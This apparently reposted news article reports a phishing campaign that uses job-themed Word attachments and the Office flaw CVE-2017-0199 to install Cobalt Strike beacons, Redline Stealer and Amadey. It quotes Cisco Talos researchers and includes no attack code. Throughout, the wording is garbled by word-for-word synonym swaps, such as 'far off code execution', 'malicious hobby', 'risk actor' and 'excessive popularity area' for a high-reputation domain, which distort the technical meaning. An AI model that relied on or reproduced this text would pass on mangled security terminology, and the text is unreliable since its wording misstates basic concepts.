hacked 1

New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons

A social engineering marketing campaign leveraging job-themed lures is weaponizing a years-vintage far off code execution flaw in Microsoft Office to set up Cobalt Strike beacons on compromised hosts.

“The payload determined is a leaked model of a Cobalt Strike beacon,” Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer stated in a brand new evaluation posted Wednesday.

“The beacon configuration consists of instructions to carry out focused system injection of arbitrary binaries and has a excessive popularity area configured, displaying the redirection approach to masquerade the beacon’s traffic.”

The malicious hobby, determined in August 2022, tries to make the most the vulnerability CVE-2017-0199, a far off code execution problem in Microsoft Office, that lets in an attacker to take manage of an affected gadget.

The access vector for the assault is a phishing e mail containing a Microsoft Word attachment that employs job-themed lures for roles withinside the U.S. authorities and Public Service Association, a change union primarily based totally in New Zealand.

Cobalt Strike beacons are a long way from the simplest malware samples deployed, for Cisco Talos stated it has additionally found using the Redline Stealer and Amadey botnet executables as payloads at the alternative stop of the assault chain.

Calling the assault methodology “noticeably modularized,” the cybersecurity organisation stated the hobby additionally sticks out for its use of Bitbucket repositories to host malicious content material that serves as a place to begin for downloading a Windows executable chargeable for deploying the Cobalt Strike DLL beacon.

In an opportunity assault sequence, the Bitbucket repository features as a conduit to supply obfuscated VB and PowerShell downloader scripts to put in the beacon hosted on a distinct Bitbucket account.

“This marketing campaign is a standard instance of a risk actor the usage of the approach of producing and executing malicious scripts withinside the victim’s gadget memory,” the researchers stated.

“Organizations need to be continuously vigilant at the Cobalt Strike beacons and enforce layered protection abilities to thwart the attacker’s tries in the sooner degree of the assault’s contamination chain.”

Leave a Comment

Your email address will not be published.